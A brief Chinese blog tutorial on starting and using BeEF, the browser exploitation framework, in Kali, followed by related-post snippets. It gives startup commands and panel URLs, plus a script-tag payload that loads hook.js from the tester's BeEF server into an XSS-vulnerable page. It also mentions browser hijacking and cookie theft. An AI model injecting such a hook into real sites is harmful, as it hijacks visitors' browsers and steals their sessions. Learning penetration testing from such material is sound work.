XSS 工具之 beef

最新推荐文章于 2024-05-09 16:26:31 发布
最新推荐文章于 2024-05-09 16:26:31 发布
阅读量759 收藏 5
点赞数
文章标签: html5 html css xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47306547/article/details/120439884
版权

目录

beef介绍

beef 的启动

 beef 的应用

 1)浏览器劫持

 2)Cookie 窃取与欺骗 -- 固定会话攻击

beef介绍

        XSS 漏洞的利用平台,kali 自带

beef 的启动

        Kali 中

        工具目录        /usr/share/beef-xss

        配置文件        config.yaml

        启动 beef 工具的方法

                1)beef-xss

                2) /usr/share/beef-xss/beef

       注:在启动前需要修改默认用户名及密码(config.yaml),否则会启动失败。 

        Web 界面管理控制台:http://192.168.11.167:3000/ui/panel

        Shellcode:http://192.168.11.167:3000/hook.js

        测试页面 :http://192.168.11.167:3000/demos/butcher/index.html

 

 beef 的应用

确认有XSS漏洞后可利用网页重定向使其跳转至指定网页

<script src="http://192.168.11.167:3000/hook.js"></script>

 1)浏览器劫持

命令模块:
          绿色模块:表示模块适合目标浏览器,并且执行对客户端不可见
          橙色模块:表示模块可用,但是对用户可见(CAM弹框申请权限)
          红色模块:表示模块不适用与当前用户,有些红色模块可以正常执行
          灰色模块:模块未在目标浏览器上测试过

 2)Cookie 窃取与欺骗 -- 固定会话攻击

 

 


。。。。。。

       

源十三
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
XSS自动化工具——Beef
世间繁华梦一出
03-10 5414
Beef的使用一、Beef简介二、beef的下载安装三、Beef配置四、Beef的使用五、Beef的主要功能 在我的记忆之中之前是有些过关于beef这款工具的使用的文章的,然而最近整理博客,一看,发现怎么没有了,可能是我忘了吧,或者可能也可能是在梦里写了。。。今天来写一下吧 一、Beef简介 Browser Exploitation Framework (BeEFBeEF 是目前最强大的浏览器开源渗透测试框架,通过xss漏洞配合JS脚本和Metasploit进行渗透, BeEF 是基于Ruby语言编写的
XSS漏洞及其工具Beef使用
ytdd66的博客
03-22 1298
XSS(Cross Site Scripting,跨站脚本漏洞)漏洞,又叫 CSS 漏洞,是最常见的 Web 应用程序漏洞。其主要原理是当动态页面中插入的内容含有特殊字符(如
Beefxss使用教程图文教程(超详细)
wangyuxiang946的博客
02-16 1万+
Beef-XSS是一款功能强大的「XSS漏洞利用工具」,kali自带,基于Ruby语言开发。
网络安全最全Beefxss使用教程图文教程(超详细)_怎么把beef改成公网ip(3),2024春招面试
最新发布
2401_84302816的博客
05-09 674
beef-XSS界面有很多栏,重点是 Commands 栏的功能指令,其他的基本用不到,不用太留意。Online Browsers:在线浏览器,工具定时发送链接请求,链接成功就会显示在这里。Offline Browsers:离线浏览器Getting Started:入门指南,官方的一些文档Logs:日志,记录工具做过哪些操作Zombies:僵尸,记录可以利用的目标站点Current Browser:上线的浏览器,只有在目标在线的时候才会显示出来。
beef工具-01】神器beef的安装与简介
m0_64378913的博客
06-01 7351
目录1 beef概述1 beef简介1.2 beef2 beef安装3 beef的重要网址4 简单测试5 总结参考文章 1 beef概述 1 beef简介 BeEF 是浏览器开发框架的缩写。 它是一款专注于网络浏览器的渗透测试工具。 随着人们越来越担心针对客户端(包括移动客户端)的网络攻击,BeEF 允许专业的渗透测试人员通过使用客户端攻击向量来评估目标环境的实际安全状况。 与其他安全框架不同,BeEF 超越了加固的网络边界和客户端系统,并在一扇敞开的门的上下文中检查可利用性:Web 浏览器。
kali2021安装beef-xss和使用
qq_53365842的博客
03-29 3381
安装beef:apt install beef-xss 切换到beef目录(kali版本不同,beef配置文件位置不同): cd /etc/beef-xss/config.yaml 或者 cd /usr/share/beef-xss/config.yaml 打开配置文件: vim /etc/beef-xss/config.yaml / vim /usr/share/beef-xss/config.yaml 修改密码和修改host值,改成kali的IP地址 启动beefbeef-xss/beef
Web应用安全:XSS通过JavaScript攻击(实验).docx
06-20
在这个实验中,我们将重点探讨XSS通过JavaScript发起的攻击,以及如何使用Beef-xss工具进行模拟攻击。 实验目的旨在让你理解XSS的基本概念,掌握其攻击方式,特别是利用JavaScript的手段,并了解攻击的实施过程。...
Web应用安全:XSS篡改页面(实验).docx
06-19
我们将使用beef-xss工具来攻击pikachu站点,模拟用户登录pikachu站点,然后在beef-xss平台上控制用户的浏览器,实施各种篡改页面攻击。 实验环境准备: 1. 首先,我们需要在Kali Linux系统中安装beef-xss工具。...
35种渗透工具
07-23
以下是一些常用的渗透测试工具,涵盖了多种功能,包括SQL注入、跨站脚本(XSS)检测、文件包含漏洞等。 1. **w3af**:Web Application Attack and Audit Framework是一款开源的渗透测试工具,用于查找和利用网页...
网络渗透测试 XSS和SQL注入
12-02
在实验环境中,使用了Kali Linux作为渗透测试平台,结合Beef、AWVS和SqlMAP等工具模拟攻击并检测漏洞。Beef是一个扩展性的Web渗透测试框架,AWVS用于自动化扫描Web应用程序的安全漏洞,SqlMAP则是一款自动化的SQL...
BeefAuto:无需配置路由器即可自动化 Beef 以通过广域网使用
07-24
在这个工具中,我为网页上的参与目标添加了两个自动网页模板,以在攻击者利用他时将目标保持在被钩住的网页上 超级马里奥游戏 腾讯视频 将添加更多(也许..) 更新 添加了 SuperMario 游戏以在攻击者做他的工作时...
BeEF-XSS详细使用教程
热门推荐
星落的博客
05-12 4万+
BeEF-XSS简介 BeEF-XSS是一款非常强大的web框架攻击平台,集成了许多payload,可以实现许多功能! 启动BeFF-XSS BeEF-XSS管理登录页面 用户名默认为beef,密码在首次启动beef-xss时需要手动设置。(启动beef-xss会自动打开浏览器) BeEF-XSS主页面介绍 Hocked Browers online browers 在线浏览器 offline browers 离线浏览器 Detials 浏览器、插件版本信息,操作系统信息 L.
Web安全 XSS漏洞的利用(Beef工具)(点击链接就被黑的技术.)
网络安全领域___专研者.
03-18 4062
XSS漏洞的 概括: XSS又叫CSS(Cross Site Script)跨站脚本攻击,指的是攻击者在Web页面,插入恶意JS代码,当用户浏览该页之时,嵌入其中JS代码就会被执行,从而达到攻击的目的.(包含:收集用户的Cookie,添加账号,修改密码,提高用户权限等等.)
kali启动beef-xss失败
weixin_47370431的博客
11-22 1895
sudo apt-get update和sudo apt-get upgrade两个命令。并且apt install时会发生无法定位软件包的问题;(我这里选择的是阿里云的)
一个好玩的工具BeEF介绍
luluoluoa的博客
05-07 1820
beef BeEF-XSS是一款非常强大的web框架攻击平台,集成了许多payload,可以实现许多功能 BeEF-XSS可以说是最强大的XSS漏洞利用工具,可以收集浏览器信息、键盘记录、社会工程等 总之就是使用beef这个工具来利用xss漏洞的 beef安装 我在kail虚拟机上安装的,很简单的在终端输入一句命令sudo apt setup beef-xss,然后安装成功设置密码就行了,因为之后在浏览器打开需要登陆,登陆名beef,密码就是安装时设置的那个 beef打开 在终端输入命令beef
XSS漏洞利用工具BeEF
RockHan
11-06 627
BeEF是Browser Exploitation Framework的缩写。随着人们越来越多地关注针对包括移动客户端在内的客户端的网络传播攻击,BeEF使专业的渗透测试人员可以使用客户端攻击向量来评估目标环境的实际安全状况。与其他安全框架不同,BeEF超越了硬化的网络边界和客户端系统,并在一个门户开放的环境中检查可利用性。BeEF将钩挂一个或多个Web浏览器,并将其用作启动定向命令模块的滩头堡,...
beef-xss详细教程(一文带你学会beef) | Kali下安装beef | beef-xss反射型,储存型利用 | beef实现Cookie会话劫持 | 键盘监听 | 浏览器弹窗,重定向等
Martin-share的博客
02-12 1万+
beef-xss详细教程(一文带你学会beef) | Kali下安装beef | beef-xss反射型,储存型利用 | beef实现Cookie会话劫持 | 键盘监听 | 浏览器弹窗,重定向等
BEEF的简介与使用
永远是少年
10-31 2122
今天继续给大家介绍渗透测试相关知识,本文主要内容是BEEF的简介与使用。 一、BEEF简介 二、BEEF渗透测试实战
利用 BeEF 执行 XSS 攻击的总结
weixin_71139244的博客
05-27 1056
跨站脚本攻击,简称XSS,是一种网站应用程序的安全漏洞攻击,属于代码注入的一种;与其他攻击相比,XSS攻击所带来的危害更大。跨站脚本攻击XSS,是最普遍的Web应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中,当正常用户访问该页面时,则可导致嵌入的恶意脚本代码的执行,从而达到恶意攻击用户的目的。
process: 33838 execstart=/usr/bin/mongod $options (code=exited, status=1/fai
07-15
根据提供的信息,process: 33838 execstart=/usr/bin/mongod $options (code=exited, status=1/fai 是关于mongod进程的执行情况的一条错误信息。 进程号33838是mongod进程的标识,execstart=/usr/bin/mongod $options 是进程启动命令,其中$options是一些选项和参数。code=exited表示进程已经退出,status=1表示进程执行失败。 这个错误信息提示mongod进程在执行过程中遇到了问题,由于字数限制,无法提供具体的错误信息。要解决这个问题,可以尝试以下步骤: 1. 检查mongod进程的日志文件,通常在/var/log/mongodb/目录中,查找错误信息或异常,可能有助于找到问题所在。 2. 检查进程启动命令中的$options选项和参数,确保它们正确且合理。如果可能,可以尝试在启动命令中省略某些选项或参数,然后逐个添加,以确定问题出现的具体选项或参数。 3. 检查系统资源是否充足,如内存、磁盘空间等,确保mongod进程可以正常运行所需的资源。 4. 更新mongod软件到最新版本,以确保获得最新的修复和改进。 5. 借助互联网和社区,搜索特定错误代码或日志信息,查找解决方案或与其他用户讨论问题。 请注意,这只是一些常见的解决步骤,根据具体情况可能需要采取其他措施。如果问题仍然存在,建议咨询更加专业的技术支持或寻求相关论坛的帮助。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值